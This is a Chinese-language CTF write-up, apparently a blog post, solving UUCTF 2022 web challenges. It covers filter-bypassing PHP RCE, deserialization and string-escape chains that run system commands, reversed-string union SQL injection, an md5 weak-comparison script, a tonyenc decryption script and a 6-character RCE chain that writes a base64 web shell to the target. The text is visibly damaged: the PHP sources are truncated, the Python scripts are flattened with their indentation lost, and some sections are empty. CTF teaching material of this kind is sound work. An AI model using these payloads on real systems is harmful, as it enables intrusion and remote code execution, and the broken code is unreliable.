目录

<1> Web

(1) websign(禁用js绕过)

(2) ez_rce(?>闭合 `rce`)

(3) ez_unser(引用传递)

(4) ez_upload(apache后缀解析漏洞)

(5) ezsql(union注入)

(6) funmd5(代码审计 %0a绕过preg_replace)

(7) phonecode(伪随机数漏洞)

(8) ezpop(反序列化字符串逃逸)

(9) backdoor(tonyenc加密&IDA逆向so文件)

(10) ezrce(限制 6字符RCE)

方法1

方法二 

(11) uploadandinject(LD_PRELOAD劫持)

---

<1> WEB

(1) websign(禁用js绕过)

禁用了右键与ctrl U 我们提前打开F12 然后再访问，即可看见源码

(2) ez_rce(?>闭合 `rce`)

PHP## 放弃把，小伙子，你真的不会RCE,何必在此纠结呢？？？？？？？？？？？？if(isset($_GET['code'])){    $code=$_GET['code'];    if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){        echo '看看你输入的参数！！！不叫样子！！';echo '
';        eval($code);    }    else{        die("你想干什么？？？？？？？？？");    }}else{    echo "居然都不输入参数，可恶!!!!!!!!!";    show_source(__FILE__);}

没有过滤 <> ? \/ 可以 ?>闭合

?code=?> 得到flag文件名称：fffffffffflagafag

rev和nl没有被过滤 利用此读取flag文件

?code=?>

(3) ez_unser(引用传递)

a=1;        $this->b=2;        $this->c=3;    }    public function __wakeup(){        $this->a='';    }    public function __destruct(){        $this->b=$this->c;        eval($this->a);    }}$a=$_GET['a'];if(!preg_match('/test":3/i',$a)){    die("你输入的不正确！！！搞什么！！");}$bbb=unserialize($_GET['a']);

反序列化，从正则上看 preg_match('/test":3/i',$a)    即我们传入的序列化数据不能通过修改属性个数来绕过wakeup

这道题和之前ISCTF比赛的 猫和老鼠 类似，可以用引用地址传递

exp：

a = &$A->b;$A->c = "system('cat /fffffffffflagafag');";echo serialize($A);?>

(4) ez_upload(apache后缀解析漏洞)

 

(5) ezsql(uNIOn注入)

简单union注入，不过是把字符串反向了 过滤了or

union注入：

?user=admin&passWord=%232%2C1+tceles+noinu+)'1

即：SELECT * FROM users WHERE passwd=('1') union select 1,2#') AND username=('nimda') LIMIT 0,1   得知有两列， 回显为1和2

过滤了 or，所以原先是ro的词，双写绕过 rroo

?user=admin&password=%23)(esabatad%3Damehcs_elbat+erehw+selbat.amehcs_noitamrofni+moorrf+)eman_elbat(tacnoc_puoorrg%2C1+tceles+noinu+)'1

 即：SELECT * FROM users WHERE passwd=('1') union select 1,group_concat(table_name) from infORMation_schema.tables where table_schema=database()#') AND username=('nimda') LIMIT 0,1

 得到flag表

查询flag表字段

?user=admin&password=%23'galf'%3Deman_elbat+dna+)(esabatad%3Damehcs_elbat+erehw+snmuloc.amehcs_noitamrofni+moorrf+)eman_nmuloc(tacnoc_puoorrg%2C1+tceles+noinu+)'1

即：SELECT * FROM users WHERE passwd=('1') union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'#') AND username=('nimda') LIMIT 0,1

 得到UUCTF

?user=admin&password=%23galf+moorrf+FTCUU%2C1+tceles+noinu+)'1

即：SELECT * FROM users WHERE passwd=('1') union select 1,UUCTF from flag#') AND username=('nimda') LIMIT 0,1

得到flag

(6) funmd5(代码审计 %0a绕过preg_replace)

 SSMd5=md5($time);$md5=$_GET["md5"];if(isset($md5)){    $sub=substr($time,-1);    $md5=preg_replace('/^(.*)0e(.*)$/','${1}no_science_notation!${2}',$md5);    if(preg_match('/0e/',$md5[0])){        $md5[0]=substr($md5[0],$sub);        if($md5[0]==md5($md5[0])&&$md5[1]===$guessmd5){            echo "well!you win again!now flag is yours.
";            echo $flag;        }        else{            echo $md5[0];            echo "oh!no!maybe you need learn more PHP!";        }    }    else{        echo "this is your md5:$md5[0]
";        echo "maybe you need more think think!";    }}else{    highlight_file(__FILE__);    $sub=strlen($md5[0]);    echo substr($guessmd5,0,5)."
";    echo "plase give me the md5!";}?>8b17e

$md5=preg_replace('/^(.)0e(.)$/','${1}no_science_notation!${2}',$md5); if(preg_match('/0e/',$md5[0]))

这两个里的条件是矛盾的，但是我们可以%0a绕过preg_replace函数，同时传入的md5[0]要满足

$md5[0]==md5($md5[0] 很常见的md5考点，弱类型比较 0e215962017 MD5加密后还是0e开头。

因此md5[0]应该传入%0a0e215962017，但是我们又多了一个%0a 换行符，通过上面这行代码 $md5[0]=substr($md5[0],$sub);

可以在 $sub=1的时候，执行会达到删去%0a的作用

而 $sub=substr($time,-1); $sub由$time决定，$sub为$time的最后一位。

要得到flag，要满足的第二个条件为：$md5[1]===$guessmd5 手动比较慢，赶不上时间，因此需要写一个python脚本

如下：

import requestsimport timeimport hashlibs = requests.session()while True:    url = "Http://43.143.7.127:28150/?md5[0]=%0a0e215962017&md5[1]={}".format(hashlib.md5(str(int(time.time())).encode('utf-8')).hexdigest())    res = s.get(url=url).text    print(res)    if 'well' in res:        print(res)        break    time.sleep(0.5)

(7) phonecode(伪随机数漏洞)

 结合这句话，可以联想到mt_rand()和mt_srand() 随机数种子，发包 得到hint，

phone不同，hint不同

 猜测phone为种子，hint为其中的伪随机数序列

phone为1时，hint：895547922   印证了刚才的想法

"; #895547922echo mt_rand()."
"; #2141438069echo mt_rand()."
"; #1546885062echo mt_rand()."
"; #2002651684?>

我们传入code为下一个随机数试一试  得到flag

(8) ezpop(反序列化字符串逃逸)

name=$str; } function __wakeup(){ if($this->key==="UUCTF"){ $this->ob=unserialize(base64_decode($this->basedata)); } else{         die("oh!you should learn PHP unserialize String escape!");         } }}class output{     public $a; function __toString(){ $this->a->rce(); }}class nothing{     public $a; public $b; public $t; function __wakeup(){ $this->a=""; } function __destruct(){ $this->b=$this->t; die($this->a); }}class youwant{     public $cmd; function rce(){ eval($this->cmd); }}$pdata=$_POST["data"];if(isset($pdata)){     $data=serialize(new UUCTF($pdata)); $data_replace=str_replace("hacker","loveuu!",$data); unserialize($data_replace);}else{     highlight_file(__FILE__);}?>

data参数可控，然后post会传入data之后，$data会new一个UUCTF类的实例对象，替换掉hacker为loveuu!,再进行反序列化

先正常传入data=jack，则$data应该为：

O:5:"UUCTF":4:{s:4:"name";s:4:"jack";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}

其中标红的是我们可控的参数

开始代码审计，在youwant类我们可以通过rce方法，实现命令执行，以此读flag，

现在找链子：

UUCTF:: nothing::__destruct() -> output::__toString() -> youwant::rce

流程即：我们通过传入的data参数，构造把后面的逃逸掉，构造新的序列化串

O:5:"UUCTF":4:{s:4:"name";s:4:"构造的";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}

  unserialize($data_replace); 这一段代码是为了触发 UUCTF的__wakeup()，我们需要真正利用的是 __wakeup()函数里，满足 $this->key==="UUCTF"条件后，执行的unserialize(base64_decode($this->basedata));

exp如下：

a="";     }     function __destruct(){     $this->b=$this->t;     die($this->a);     }}class youwant{     public $cmd="system('cat flag.php');";}$A = new nothing();$A->a = &$A->b;$A->t = new output();$A->t->a = new youwant();$basedata = base64_encode(serialize($A));$data = '";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:'.strlen($basedata).':"'.$basedata.'";s:2:"ob";N;}';$hacker='';for($i=0;$i

得到：Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19

所以构造的序列化串应为：

O:5:"UUCTF":4:{s:4:"name";s:4:"";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:176:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19";s:2:"ob";N;}";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}

但是我们要满足前面的s:*:"构造的" 长度*为我们构造的串的长度，一个hacker换为loveuu! 可以逃逸出一个字符，红色串总长为 236，因此需要236个hacker

最终查看源码，得到flag

 详细有关反序列化逃逸可以参考我前面的文章：buuctf刷题9 (反序列化逃逸&shtml-SSI远程命令执行&idna与utf-8编码漏洞)_葫芦娃42的博客-CSDN博客_apache ssi 远程命令执行 过滤绕过

(9) backdoor(tonyenc加密&IDA逆向so文件)

布里茨贼猛  lol里机器人叫布里茨，联想到robots.txt

看见www.zip，存在备份文件泄露 下载下来 backdoor.php 结合文件名称，应该是被加密的后门

 还有一个so.so文件  看其他师傅wp，此题需要逆向的知识

2022UUCTF-web_yb0os1的博客-CSDN博客_uuctf 2022

IDA 逆向 .so文件

so文件是linux下向当于windows下的dll文件，Linux下的程序函数库,即编译好的可以供其他程序使用的代码和数据

 发现了 tonyenc_encode加密代码

 双击代码里的tonyenc_key 得到 header和key的十六进制数据

 百度搜索后得知

tonyenc 是一个简洁、高性能、跨平台的 PHP7 代码加密扩展，可以加密php文件内容，PHP 在运行它们时会自动解密

GitHub上的地址为：GitHub - lihancong/tonyenc: 高性能、跨平台的 PHP7 代码加密扩展 (A high performance and cross-platform encrypt extension for PHP source code)

贴上yb0os1师傅根据源码写的解密脚本：

import base64header=[    0x66, 0x88, 0xff, 0x4f,    0x68, 0x86, 0x00, 0x56,    0x11, 0x61, 0x16, 0x18,]key=[    0x9f, 0x58, 0x54, 0x00,    0x58, 0x9f, 0xff, 0x23,    0x8e, 0xfe, 0xea, 0xfa,    0xa6, 0x35, 0xf3, 0xc6]def decode(data,len):    p =0    for i in range(0,len):        if (i & 1):            p += key[p] + i;            p %= 16;            t = key[p];            data[i] = ~data[i]^t;            if data[i] < 0:                data[i]=data[i]+256                decode = "".join([chr(c) for c in data])                return decodeencodefile=open('backdoor.php',"rb")base64_encodestr=base64.b64encode(encodefile.read())convert=[c for c in base64.b64decode(base64_encodestr)]del convert[0:len(header)]print(str(decode(convert,len(convert))))

解密得到backdoor.php文件内容为

(10) ezrce(限制 6字符RCE)

题目描述：这是一个命令执行接口

方法1

>nl

执行后，会创建名为 nl 的文件
* /*>d

意思就是 nl /*>f  第一个*就是将ls列出文件名第一个当作命令 其他当作参数 即 nl /*>d

方法二 

>a 在Linux会创建一个叫a的文件
*>v 会将ls列出的第一个文件名当作命令 其余当作参数执行
*v>0 等价于 rev v >0 反转
sh 0 将0文件的内容当作命令执行
ls -th 按照文件的创建时间（后创建先列出）ls -t就可以 这里加上h是为了按照 sl ht- f\>排列
linux下换行执行命令：
ech\
o\
 111

贴上yb0os1师傅的脚本： tql

url="http://43.142.108.3:28933/post.php"print("[+]start attack!!!")with open("5字符RCE.txt", "r") as f:    for i in f:        data = {"cmd": f"{i.strip()}"}        requests.post(url=url,data=data)resp = requests.get("http://43.142.108.3:28933/tmp/1.php")if resp.status_code == requests.codes.ok:    print("[*]Attack success!!!")    5字符RCE.txt>dir>sl>ht->f\>*>v>rev*v>0>hp>1.p\\>d\>\\>\ -\\>e64\\>bas\\>7\|\\>XSk\\>Fsx\\>dFV\\>kX0\\>bCg\\>XZh\\>AgZ\\>waH\\>PD9\\>o\ \\>ech\\sh 0sh f

(11) uploadandinject(LD_PRELOAD劫持)

下面准备开一章 LD_PRELOAD，仔细研究一下，这道题就写下一篇里吧

参考：2022UUCTF-web_yb0os1的博客-CSDN博客_uuctf 2022

来源地址：https://blog.csdn.net/weixin_63231007/article/details/128046320